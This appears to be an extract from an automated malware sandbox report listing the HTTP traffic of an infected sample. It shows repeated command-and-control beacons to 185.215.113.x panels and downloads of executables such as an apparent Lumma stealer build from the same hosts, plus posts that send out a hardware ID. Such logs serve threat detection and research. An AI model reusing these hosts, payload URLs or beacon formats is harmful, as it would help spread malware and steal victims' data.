                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117If-Modified-Since: Thu, 12 Sep 2024 13:56:06 GMTIf-None-Match: "66e2f2f6-414a00"
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000254001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /dobre/acentric.exe HTTP/1.1Host: 185.215.113.16
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000284001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /inc/2.exe HTTP/1.1Host: 185.215.113.16
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000285001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: GET /dobre/splwow64.exe HTTP/1.1Host: 185.215.113.16
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000287001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000290001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.100
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000308001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFIDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a Data Ascii: ------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------IIJKJDAFHJDHIEBGCFIDContent-Disposition: form-data; name="build"save------IIJKJDAFHJDHIEBGCFID--
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000314001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET /malesa/66ed86be077bb_12.exe HTTP/1.1Host: 147.45.44.104
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 31 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000318001&unit=246122658369
                                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                                    Source: global trafficHTTP traffic detected: GET /Files/2.exe HTTP/1.1Host: 103.130.147.211
                                    Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKJDBAAKJDGCBFHCFCGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 47 2d 2d 0d 0a Data Ascii: ------EBKJDBAAKJDGCBFHCFCGContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------EBKJDBAAKJDGCBFHCFCGContent-Disposition: form-data; name="build"save------EBKJDBAAKJDGCBFHCFCG--
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                    Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
